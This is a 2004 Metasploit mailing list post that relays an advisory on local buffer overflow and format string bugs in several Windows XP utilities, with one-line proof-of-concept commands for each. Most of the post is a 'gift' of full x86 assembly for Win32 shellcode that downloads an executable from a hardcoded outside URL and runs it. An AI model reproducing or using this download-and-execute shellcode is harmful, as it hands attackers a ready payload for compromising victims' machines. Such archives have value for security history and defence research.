Metasploit mailing list archives
Windows XP multiple local buffer overflows and format string bugs
From: jerome.athias at caramail.com (Jérôme ATHIAS)
Date: Fri, 22 Oct 2004 18:23:41 GMT
Hi guys, i just come after moving so sorry if i'm wrong but i don't remember to have seen this on the bugtraq, so if someone is interested... AUTHOR Komrade DATE 08/10/2004 PRODUCT Windows XP Tested on Windows XP Service Pack 2, prior versions should have the same bugs. DETAILS Here is a list of some Windows XP utilities that are vulnerable to local buffer overlows and format string bugs. These programming errors, alone, are not security vulnerabilities (you need local access and you don't gain more privilege), but they could became serious security issues if someone has the possibility to remotely start a program with at least a parameter (what happens with the "shell:" protocol security issue in the Mozilla browser prior to version 1.7.3, that permits to remotely execute a program and pass to it parameters). These informations have been disclosed to inform you that if a new vulnerability will be discovered which allows remote execution of programs (passing parameters), all Windows XP operating system will be affected by several remote buffer overflows and format string vulnerabilities allowing remote code execution. Buffer Overlow in immc.exe POC c:\> immc.exe aaaaaaaaaa(285 'a' characters) Buffer Overlow in eventvwr.exe (UNICODE) POC c:\> eventvwr.exe aaaaaaaaaa(848 'a' characters) Buffer Overlow in netsetup.exe POC c:\> netsetup.exe aaaaaaaaaa(285 'a' characters) Buffer Overlow in mrinfo.exe POC c:\> mrinfo.exe aaaaaaaaaa(71 'a' characters) Format String in sort.exe POC c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n GIFT: This is a generic win32 web downloading and executing shellcode for your collection [BITS 32] jmp data start: pop edi call LK32Base mov ebx,eax push eax ; kernel32 base address push 0xec0e4e8e ; LoadLibraryA hash call LGetProcAddress ; find address xor ecx, ecx ; ecx = 0 mov cx, 0x6e6f ; Move "on" in cx push ecx ; Push null-terminated "on" push 0x6d6c7275 ; Push "urlm", completing "urlmon\0" push esp ; lpLibFileName call eax ; eax holds our function address download: push eax ; urlmon.dll base address push 0x702f1a36 ; URLDownloadToFileA hash call LGetProcAddress ; find address xor ecx, ecx ; ecx = 0 for later use push ecx ; lpfnCB push ecx ; dwReserved lea esi, [edi ] ; Path is [edi + start_of_filename] push esi ; szFileName lea esi, [edi+8] push esi ; szURL push ecx ; pCaller call eax ; eax holds our function address exec: push ebx push 0x0e8afe98 call LGetProcAddress ;winexec push ecx push edi call eax xor ecx,ecx dec ecx bla: loop bla ;stupid loop remove if you don't like it push ebx push 0x73e2d87e call LGetProcAddress call eax ;exit LK32Base: push ebp push esi mov eax, [fs:0x30] mov eax, [eax + 0x0c] mov esi, [eax + 0x1c] lodsd mov ebp, [eax + 0x08] mov eax, ebp pop esi pop ebp ret LGetProcAddress: push ebx push ebp push esi push edi mov ebp, [esp + 24]; DLL Base Address */ mov eax, [ebp + 0x3c]; eax = PE header offset */ mov edx, [ebp + eax + 120] add edx, ebp; edx = exports directory table */ mov ecx, [edx + 24]; ecx = number of name pointers */ mov ebx, [edx + 32] add ebx, ebp; ebx = name pointers table */ LFnlp: jecxz LNtfnd dec ecx mov esi, [ebx + ecx * 4] add esi, ebp; esi = name pointer */ xor edi, edi cld LHshlp: xor eax, eax lodsb cmp al, ah je LFnd ror edi, 13 add edi, eax jmp LHshlp LFnd: ; compare computed hash to argument */ cmp edi, [esp + 20] jnz LFnlp mov ebx, [edx + 36]; ebx = ordinals table RNA */ add ebx, ebp mov cx, [ebx + 2 * ecx]; ecx = function ordinal */ mov ebx, [edx + 28]; ebx = address table RVA */ add ebx, ebp mov eax, [ebx + 4 * ecx]; eax = address of function RVA */ add eax, ebp jmp LDone LNtfnd: xor eax, eax LDone: mov edx, ebp pop edi pop esi pop ebp pop ebx ret data: call start db "mhh.exe",0x00 ; db "http://www.ilovedelikon.com/notbig.exe", 0x00 Sorry if these informations are out of date or shit...null Forfait AOL ADSL 5 M?ga ? 22.90EUR/mois
Current thread:
- Windows XP multiple local buffer overflows and format string bugs Jérôme ATHIAS (Oct 22)